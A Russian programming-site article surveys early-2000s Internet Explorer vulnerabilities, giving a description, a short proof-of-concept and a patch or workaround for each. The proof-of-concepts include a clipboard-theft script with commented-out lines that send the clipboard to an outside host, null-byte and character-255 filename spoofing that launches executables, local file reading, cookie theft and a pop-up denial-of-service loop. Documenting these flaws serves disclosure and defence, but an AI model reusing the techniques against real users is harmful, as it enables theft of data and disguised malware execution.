Навигация
Главная
Поиск
Форум
FAQ's
Ссылки
Карта сайта
Чат программистов

Статьи
-Delphi
-C/C++
-Turbo Pascal
-Assembler
-Java/JS
-PHP
-Perl
-DHTML
-Prolog
-GPSS
-Сайтостроительство
-CMS: PHP Fusion
-Инвестирование

Файлы
-Для программистов
-Компонеты для Delphi
-Исходники на Delphi
-Исходники на C/C++
-Книги по Delphi
-Книги по С/С++
-Книги по JAVA/JS
-Книги по Basic/VB/.NET
-Книги по PHP/MySQL
-Книги по Assembler
-PHP Fusion MOD'ы
-by Kest
Professional Download System
Реклама
Услуги

Автоматическое добавление статей на сайты на Wordpress, Joomla, DLE
Заказать продвижение сайта
Программа для рисования блок-схем
Инженерный калькулятор онлайн
Таблица сложения онлайн
Популярные статьи
OpenGL и Delphi... 65535
Форум на вашем ... 65535
HACK F.A.Q 65535
Бип из системно... 65535
Гостевая книга ... 65535
Invision Power ... 65535
Содержание сайт... 65535
Организация зап... 65535
Вызов хранимых ... 65535
Программируемая... 65535
Эмулятор микроп... 65535
Подключение Mic... 65535
Создание потоко... 65535
Приложение «Про... 65535
Оператор выбора... 65535
Создание отчето... 63938
Модуль Forms 63649
ТЕХНОЛОГИИ ДОСТ... 60511
Пример работы с... 59986
Имитационное мо... 56004
Реклама
Сейчас на сайте
Гостей: 7
На сайте нет зарегистрированных пользователей

Пользователей: 13,079
новичок: Openair
Новости
Реклама
Выполняем курсовые и лабораторные по разным языкам программирования
Подробнее - курсовые и лабораторные на заказ
Delphi, Turbo Pascal, Assembler, C, C++, C#, Visual Basic, Java, GPSS, Prolog, 3D MAX, Компас 3D
Заказать программу для Windows Mobile, Symbian

База данных студентов на Delphi (файл записей) + Блок схемы
Расчет размера дохода на одного человека в Turbo Pascal
Меры близости на векторах в Delphi + Блок схемы

Реклама



Подписывайся на YouTube канал о программировании, что бы не пропустить новые видео!

ПОДПИСЫВАЙСЯ на канал о программировании
Обзор уязвимостей Internet Explorer
Похищение содержимого буфера обмена
Описание: Начиная с пятой версии имеется возможность считывать и записывать буфер обмена из скрипта, по умолчанию, и без предупреждения. Это может быть полезно для веб-приложений, но может быть использовано злоумышленником для похищения буфера обмена.
function checkClip() { try { var newStr =
clipboardData.getData("Text"); } catch(e) { clearInterval(clipInt);
alert("Couldn't gain access
to the clipboard contents"); } if (clipStr != newStr)
{ // These commented-out lines would send the clipboard
contents. // xmlhttp.open("GET", "http://my.site.com/mysсript.asp",
false); // xmlhttp.send(newStr); alert("This sсript
could now have sent...\n\n" + newStr + "\n\n...to
me!"); clipStr = newStr; } }
Образец применения.
Решение: Измените значение опции Tools > Internet Options > Security > Select a security zone > Custom Level > sсripting > Allow paste operations via sсript.
Автор: Том Глайдер. 12 января 2001.
Подробности об автоматическом запуске программ Об этой уязвимости мы коротко рассказывали ранее, в «Сводке по уязвимостям Internet Explorer 5.0, 5.5, 6.0» под заголовком «Подделка расширения файла». Джоуко Пыннонен, открывший эту уязвимость, опубликовал подробности. Трюк оказался простым — надо просто добавить символ с ASCII-кодом 0 в имя файла. Веб-сервер злоумышленника может установить через заголовок Content-disposition такое имя файла, как README.TXT%00PROG.EXE. Если файл пересылается сервером, как attachment (речь о параметре заголовка Content-disposition, а не приложенном к письму файле), то IE отобразит в диалоге скачивания файла только README.TXT (если не установлена заплатка). Видимо, %00 декодируется, и функции отображения строк трактуют символ, как конец null-terminated строки. А если пользователь нажмёт кнопку «Открыть», то будет использовано полное имя файла и программа запустится.
Если в заголовке Content-disposition вместо attachment написать inline, и правильно выбрать MIME-тип, то браузер скачает и запустит программу без всяких диалогов и предупреждений. MIME-тип может быть установлен через заголовок Content-type. MIME-типы, вызывающие автоматическое открытие файла различаются от версии к версии. Например в IE6 это text/css, а в IE5 audio/midi.
Решение: заплатка от 13 декабря 2001 года.
Подмена расширения файла в Windows Explorer («Проводник») Назовите любой exe-файл «file.html .exe». Используйте символ ASCII с кодом 255 (FF) вместо пробелов. Посмотрите на файл в Windows Explorer — всё, вы увидите только file.html. .exe будет на другой строке... Эээ... Это сложно объяснить, поиграйтесь с эитм и вы сами всё поймёте. Я уверен, что вы можете таким же образом подменить имя файла в Internet Explorer. Также я экспериментировал с именами файлов вроде www.something.com — они выглядят, как интернет-адреса, но на самом деле исполняемые файлы.
Автор: Том Миклович. 15 января 2001.
SuperCookies, обходящие настройки обычных cookie и P3P Описание: Есть проблема с приватностью в Internet Explorer. Она возникла из-за ошибки разработки Windows Media Player (WMP). Используя простой javаsсript веб-сайт может захватить уникальный номер WMP, принадлежащий посетителю сайта. Номер может быть использован как cookie для отслеживания путей пользователя по интернету. Этот ID является SuperCookie, поскольку он может быть использован сайтами для обхода всех средств защиты приватности, добавленных Microsoft в IE 6, который сейчас поставляется со всеми версиями Windows XP. SuperCookies также работают во всех предыдущих версиях IE и Windows. Эксплоит:



alert(document.WMP.ClientID);


Пример использования SuperCookie.

Проблема с функцией GetObject()
Уязвимые версии: 5.5, 6.0.
Описание: Забавная уязвимости вида directory transversal, позволяет убрать из URL протокол и читать локальные файлы. a=GetObject("http://"+lоcation.host+"/../../../../../../test.txt","htmlfile"); Решение: Отключить Active sсripting и никогда не включать. Лучше вообще не использовать Internet Explorer в опасных окружениях, к каким принадлежит интернет.
Автор: Георгий Гунинский. 01 января 2002.
Дополнение от the Pull
Есть ещё кое-что. Я нашёл способ получать информацию о местоположении некоторых файлов. Вот стандартный адрес index.dat: file:///::{450D8FBA-AD25-11D0-98A8-0800361B1103}/../ Local%20Settings/ Temporary%20Internet%20Files/ Content.IE5/index.dat (Пробелы из адреса необходимо убрать. Таких адресов существует много, их использование, правда, может быть неодинаково успешным.)
Код ниже использует этот адрес, показывая полный путь к файлу во всплывающем окне. setTimeout("alert (funObject2.document.body.innerHTML)",500);')" Автор: the Pull. 2 января 2001.
Возможность узнать наличие файла в системе
Описание: Я обнаружил, что вы можете запросить систему о наличии любого файла, если знаете путь к нему. Вот скрипт: Автор: Том Милкович. 3 января 2001.
Локальный DoS с использованием немодальных всплывающих окон
Описание: В Internet Explorer 6 (и, возможно, 5.0) есть баг, который позволяет javаsсript вызвать огромное количество немодальных диалогов, содержащих страницу, вызвавшую их. Окна остаются после уничтожения процесса iexplore, продолжая нагружать процессор. Эксплоит: function exploit() { while(1) { showModelessDialog("exploit.html"); } Решение: Отключить javаsсript.
Автор: Лэнс Хитчкок мл. 6 января 2001.
Доступ к локальным файлам через компонент Microsoft.XMLHTTP
В компоненте Microsoft.XMLHTTP, поставляемом вместе с шестой версией Internet Explorer присутствует ошибка — компонент неправильно обрабатывает HTTP-редиректы на локальные файлы. Чтобы эксплоит работал необходимо знать имя файла.
Уязвимые программные продукты:
IE 6 / Windows 98
IE 6 / Windows XP
IE 6 / Windows 2000 (Service Pack 2)
Эксплоит (отображает содержимое файла C:\jelmer.txt):

function exploit() { // open the file on the users
harddisk using a http redirect var xmlhttp = new
ActiveXObject ("Microsoft.XMLHTTP");
xmlhttp.Open("GET", "servlet/RedirectServlet?fileName=c:/jelmer.txt",
false); xmlhttp.Send(); alert(xmlhttp.responseText); }



Автор эксплоита: jelmer.
Подделка расширения файла
Администратор сервера имеет возможность назвать исполняемый файл README.TXT, index.html или sample.wav. Если пользователь выберет «открыть файл из текущего места» (open the file from its current lоcation), то приложение запуститься без предупреждений. Даже, если скачивание обычного .EXE с сервера вызывает окно с предупреждением. У пользователя нету возможности определить является ли файл программой, а не текстом, HTML или другим безопасным типом файлов.
Уязвимость открыта Jouko Pynnonen.
Уязвимые программные продукты:
IE 5.0
IE 5.5
IE 6.0
Opera 5.12
Пример: http://www.geilerserver.de/text.txt.
Предлагается открыть файл, в случае положительного ответа запускается программа (калькулятор).
Чтобы не подвергаться опасности установите кумулятивный патч Q313675 (MS Security Bulletin MS01-058). Было замечено, что патч невозможно установить через Windows Update, только вручную.
ПОХИЩЕНИЕ COOKIES, ЧТЕНИЕ ФАЙЛОВ С ДИСКА
Просто используя метод javаsсript document.open и не используя document.close можно: похищать cookies; читать локальные файлы, обрабатываемые (parsable) Internet Explorer (HTML, если быть точном); и подменять сайты.
Эксплоиты прилагаются (см. ниже). cookieStealing.html открывает Yahoo.com и похищает cookie. fileReading.html открывает и читает файл C:\test.txt. SiteSpoofing.html скрывает (на Windows 2000) или подменяет (на Windows 98) настоящий адрес документа.
Уязвимые платформы:
IE 6.0.2600.0000, Windows 2000 с установленными Q312461, Q240308, Q313675
IE 6.0.2600.0000, Windows 98 с установленным Q313675
IE 5.5, Windows 2000 SP2
Уязвимость обнаружена группой the Pull. Заплатка для устранения этой уязвимости пока не выпущена.
Как включить Пятый уровень безопасности в ie 6.0
Вообще пятый уровень всегда скрыт, т.к. обычным пользователям это не нужно. Но если Вы не обычный пользователь и Вам нужен уровень безопастности выше стандартного максимального, то тогда зайдите в редактор реестра и найдите:
HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionInternetSettingsones "Flags"=dword: 0X00000021 (33) ---default
И надо заменить опцию на
"Flags"=dword: 0X00000001 (1)
После этого перегружайтесь и - все!
Опубликовал Kest October 26 2008 16:40:55 · 0 Комментариев · 7163 Прочтений · Для печати

• Не нашли ответ на свой вопрос? Тогда задайте вопрос в комментариях или на форуме! •


Комментарии
Нет комментариев.
Добавить комментарий
Имя:



smiley smiley smiley smiley smiley smiley smiley smiley smiley
Запретить смайлики в комментариях

Введите проверочный код:* =
Рейтинги
Рейтинг доступен только для пользователей.

Пожалуйста, залогиньтесь или зарегистрируйтесь для голосования.

Нет данных для оценки.
Гость
Имя

Пароль



Вы не зарегистрированны?
Нажмите здесь для регистрации.

Забыли пароль?
Запросите новый здесь.
Поделиться ссылкой
Фолловь меня в Твиттере! • Смотрите канал о путешествияхКак приготовить мидии в тайланде?
Загрузки
Новые загрузки
iChat v.7.0 Final...
iComm v.6.1 - выв...
Visual Studio 200...
CodeGear RAD Stud...
Шаблон для новост...

Случайные загрузки
De Knop
Delphi 6 программ...
Панель "Случайное...
Программирование ...
Рисование PopupMenu
PDF
Просмотр коммент...
TDBF
Алгоритмы шифрова...
Редактор анимаций
Degisy Data Acces...
Dealer
Geo-Whois
ActiveX в Delphi
Создание Web-сайт...
Архив значков
SMExport
Применение жадног...
Карта сайта
ZipForge

Топ загрузок
Приложение Клие... 100450
Delphi 7 Enterp... 85856
Converter AMR<-... 20067
GPSS World Stud... 12518
Borland C++Buil... 11579
Borland Delphi ... 8508
Turbo Pascal fo... 7023
Visual Studio 2... 4989
Калькулятор [Ис... 4739
FreeSMS v1.3.1 3536
Случайные статьи
Элементы содержания
Двунаправленные ин...
От автора
Этапы сборки
Листинг 13.3. Испо...
Команда UPDATE
подпись ко всем по...
Редактирование и у...
быть прочитана при...
Code generation error
ws — объект
Вторая причина
Тестирование, поис...
Подсистема VM
Ключевые факты об ...
Определение вторич...
memory_object_data...
Сбор данных с прим...
Пространство имен XML
Фильтрация таблиц ...
Описать объект, вк...
Пользователь может...
в кадре использует...
Каков результат ра...
Фотокниги
Статистика



Друзья сайта
Программы, игры


Полезно
В какую объединенную сеть входит классовая сеть? Суммирование маршрутов Занимают ли таблицы память маршрутизатора?